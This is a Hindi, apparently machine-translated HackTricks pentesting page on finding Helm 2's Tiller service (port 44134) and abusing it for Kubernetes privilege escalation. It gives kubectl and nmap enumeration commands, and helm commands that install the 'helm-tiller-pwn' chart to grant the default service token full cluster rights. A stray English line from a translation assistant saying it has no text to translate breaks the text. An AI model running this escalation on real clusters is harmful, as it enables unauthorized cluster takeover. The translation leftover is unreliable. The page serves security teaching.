8.4 KiB
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
- 💬 Discord group में शामिल हों या telegram group में या Twitter पर मुझे 🐦 @carlospolopm का अनुसरण करें.
- HackTricks के github repos और HackTricks Cloud में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
मूल जानकारी
Helm Kubernetes के लिए पैकेज मैनेजर है। यह YAML फाइलों को पैकेज करने और उन्हें सार्वजनिक और निजी रिपोजिटरीज में वितरित करने की अनुमति देता है। इन पैकेजों को Helm Charts कहा जाता है। Tiller एक सेवा है जो डिफ़ॉल्ट रूप से पोर्ट 44134 पर चल रही होती है जो सेवा प्रदान करती है।
डिफ़ॉल्ट पोर्ट: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
सूचीकरण
यदि आप पॉड्स और/या सेवाओं का सूचीकरण विभिन्न नामस्थानों में कर सकते हैं, तो उन्हें सूचीबद्ध करें और "tiller" नाम वाले लोगों की खोज करें:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Since you haven't provided any specific text to translate, I can't proceed with a translation. Please provide the English text you want to be translated into Hindi, and I'll be happy to assist you.
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
आप यह भी प्रयास कर सकते हैं कि पोर्ट 44134 की जांच करके यह सेवा चल रही है या नहीं:
sudo nmap -sS -p 44134 <IP>
एक बार जब आप इसे खोज लेते हैं, तो आप इससे संवाद कर सकते हैं क्लाइंट helm एप्लिकेशन डाउनलोड करके। आप homebrew
जैसे टूल्स का उपयोग कर सकते हैं, या आधिकारिक रिलीज़ पेज** पर देख सकते हैं।** अधिक जानकारी के लिए, या अन्य विकल्पों के लिए, स्थापना गाइड देखें।
फिर, आप सेवा की गणना कर सकते हैं:
helm --host tiller-deploy.kube-system:44134 version
विशेषाधिकार वृद्धि
डिफ़ॉल्ट रूप से Helm2 को namespace kube-system में उच्च विशेषाधिकारों के साथ स्थापित किया गया था, इसलिए यदि आपको सेवा मिलती है और इस तक पहुँच है, तो यह आपको विशेषाधिकार वृद्धि करने की अनुमति दे सकती है।
आपको बस इतना करना है कि इस तरह का एक पैकेज स्थापित करें: https://github.com/Ruil1n/helm-tiller-pwn जो डिफ़ॉल्ट सर्विस टोकन को पूरे क्लस्टर में सब कुछ तक पहुँच प्रदान करेगा।
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
http://rui0.cn/archives/1573 में आपके पास हमले की व्याख्या है, लेकिन मूल रूप से, यदि आप helm-tiller-pwn/pwnchart/templates/ के अंदर clusterrole.yaml और clusterrolebinding.yaml फाइलों को पढ़ते हैं, तो आप देख सकते हैं कि कैसे सभी विशेषाधिकार डिफ़ॉल्ट टोकन को दिए जा रहे हैं।
htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से नायक तक
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs का संग्रह
- 💬 Discord group में शामिल हों या telegram group में या Twitter 🐦 पर मुझे फॉलो करें @carlospolopm.
- HackTricks के github repos और HackTricks Cloud में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।